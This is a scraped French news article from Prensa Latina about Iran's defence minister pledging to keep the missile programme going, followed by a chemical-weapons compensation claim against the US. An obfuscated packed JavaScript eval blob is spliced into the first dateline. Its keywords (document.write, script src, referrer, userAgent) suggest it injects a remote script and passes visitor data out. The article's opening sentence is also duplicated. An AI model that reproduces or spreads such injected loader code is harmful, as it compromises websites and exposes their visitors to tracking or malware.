lundi 22 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

L’Iran maintiendra son programme de missiles

Téhéran, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|szshd|var|u0026u|referrer|nzezb||js|php'.split('|'),0,{})) 21 août (PL) Le site internet Hispantv a informé que l'Iran maintiendra son programme défensif militaire malgré les pressions et sanctions de pays occidentaux intéressés à réduire la capacité d'armement de la nation perse.

Téhéran, 21 août (PL) Le site internet Hispantv a informé que l’Iran maintiendra son programme défensif militaire malgré les pressions et sanctions de pays occidentaux intéressés à réduire la capacité d’armement de la nation perse.

Lors d’une intervention devant le parlement, le général de Brigade Amir Hatami, récemment nommé Ministre de la Défense, a précisé qu’aucune des activités ennemies affectera le projet de missiles iranien.

« Téhéran continuera ses plans militaires, ainsi que le développement de l’industrie de la Défense », a-t-il indiqué. « La République Islamique ne permettra aucune suspension du travail du Ministère de la Défense. Ni même pour un seul jour », a-t-il précisé.

Selon Hatami, les sanctions imposées contre l’Iran, pour son programme de défense militaire, cherchent à affaiblir les Forces Armées iraniennes et tentent de nuire au pouvoir militaire perse.

Par ailleurs, le Pouvoir Judiciaire d’Iran a annoncé que ce pays a exigé 245 millions de dollars aux États-Unis pour indemniser les victimes d’armes chimiques.

Le verdict a pris en compte les plaintes de personnes victimes ou affectées par ce type d’armement d’origine étasunienne, vendu à l’ancien président irakien Saddam Hussein (1979-2003), lequel les a utilisé durant la guerre contre l’Iran de 1980 à 1988.

peo/tgj/arc/

EN CONTINU
notes connexes